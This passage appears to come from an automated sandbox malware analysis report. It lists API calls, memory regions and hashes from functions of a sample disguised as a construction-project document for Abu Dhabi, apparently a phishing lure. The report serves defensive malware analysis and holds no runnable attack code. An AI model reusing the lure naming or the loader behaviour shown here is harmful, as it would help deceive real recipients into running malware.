                                                                                                                          • Associated: 00000000.00000002.1968042023.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1968066421.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocErrorLastVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 497505419-0
                                                                                                                          • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                          • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                                          • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                          • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                                          Function 004026F9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                                                                                            • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointerwsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 327478801-0
                                                                                                                          • Opcode ID: 8a12d942855201ad551ff6b8522964b2a85f1590b66411236d4fcde10ada766a
                                                                                                                          • Instruction ID: c1a7dfb6bf4929fe1d7a037cd3c1fce150a4b9cbb888a554fff21e85dc6fb100
                                                                                                                          • Opcode Fuzzy Hash: 8a12d942855201ad551ff6b8522964b2a85f1590b66411236d4fcde10ada766a
                                                                                                                          • Instruction Fuzzy Hash: 4DE01AB1B10114ABDB01ABE59D49CFFB66CEB40318F20083BF101B00D1C27949019A7E
                                                                                                                          Function 00402253 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 390214022-0
                                                                                                                          • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                                          • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                                                                                          • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                                          • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                                                                                          Function 00402C44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,000002F6,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Open
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 71445658-0
                                                                                                                          • Opcode ID: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                                                                                          • Instruction ID: 330ade1cb5eaca6017f72c73cdc8309555cb727b7ded56d963bee508ab8c6b31
                                                                                                                          • Opcode Fuzzy Hash: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                                                                                          • Instruction Fuzzy Hash: A2E04676290108BADB00EFA4EE4AF9A77ECEB18704F008421B608E6091C774E9408BA8
                                                                                                                          Function 00405C7B Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C8F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                                          • Instruction ID: 39c184252658266456f323190e8639734e0c032000ef403b7d50d3af51f805c1
                                                                                                                          • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                                          • Instruction Fuzzy Hash: 68E08632108659ABEF105E508C00AEB3B5CEB04754F004832F911E3140D234E8118BA4
                                                                                                                          Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • VirtualProtect.KERNELBASE(1000405C,?,?,1000404C), ref: 100027E5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1968028222.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1968005131.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1968042023.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1968066421.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 544645111-0
                                                                                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                          • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                          • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                                          Function 00402295 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileString
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1096422788-0
                                                                                                                          • Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                                                                                          • Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
                                                                                                                          • Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                                                                                          • Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759
                                                                                                                          Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetFileAttributesW.KERNELBASE(00000000,?,?), ref: 004015A6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                                                                                          • Instruction ID: 73733a4af0cc64661bb0b95da8c6c6dbb498264e8b287c2b288e90457a890fe4
                                                                                                                          • Opcode Fuzzy Hash: 68a001bc1327843e2883382ea1a3ef1d27013be19fa5e5411c30e9fb0f16b135
                                                                                                                          • Instruction Fuzzy Hash: B8D012B2B08100D7CB10DFE59A08ADDB765AB50329F304A77D111F21D0D2B885419A3A
                                                                                                                          Function 004041E6 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                                                                                          • Instruction ID: 838c4c0eb33ef43ad7257432987c28a2a788b3f909dd0a51a4998ccc95d90969
                                                                                                                          • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                                                                                          • Instruction Fuzzy Hash: 57C09B717443017BDB308B509D49F1777556754B00F1488397700F50E0CA74E452D62D
                                                                                                                          Function 0040330F Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 973152223-0
                                                                                                                          • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                                          • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                                                                          • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                                          • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                                                                          Function 004041CF Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,?,00000001,00403FFB), ref: 004041DD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          • Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                                                                                          • Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
                                                                                                                          • Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                                                                                          • Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
                                                                                                                          Function 004041BC Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00403F94), ref: 004041C6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2492992576-0
                                                                                                                          • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                                                                                          • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                                                                                                          • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                                                                                          • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                                                                                                          Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3472027048-0
                                                                                                                          • Opcode ID: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                                                                                          • Instruction ID: 43bd389e684fdc992c114de42b340604c9c8a7aa9960d5983178e32e9e1c03f3
                                                                                                                          • Opcode Fuzzy Hash: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                                                                                          • Instruction Fuzzy Hash: 42D0C9B7B141409BDB50EBB8AE8989B73A8E7913297204C73D942F20A1D178D8029A39

                                                                                                                          Non-executed Functions

                                                                                                                          Function 00404BB0 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404BC8
                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404BD3
                                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00404C1D
                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404C30
                                                                                                                          • SetWindowLongW.USER32(?,?,004051A8), ref: 00404C49
                                                                                                                          • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404C5D
                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C6F
                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C85
                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C91
                                                                                                                          • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404CA3
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404CA6
                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404CD1
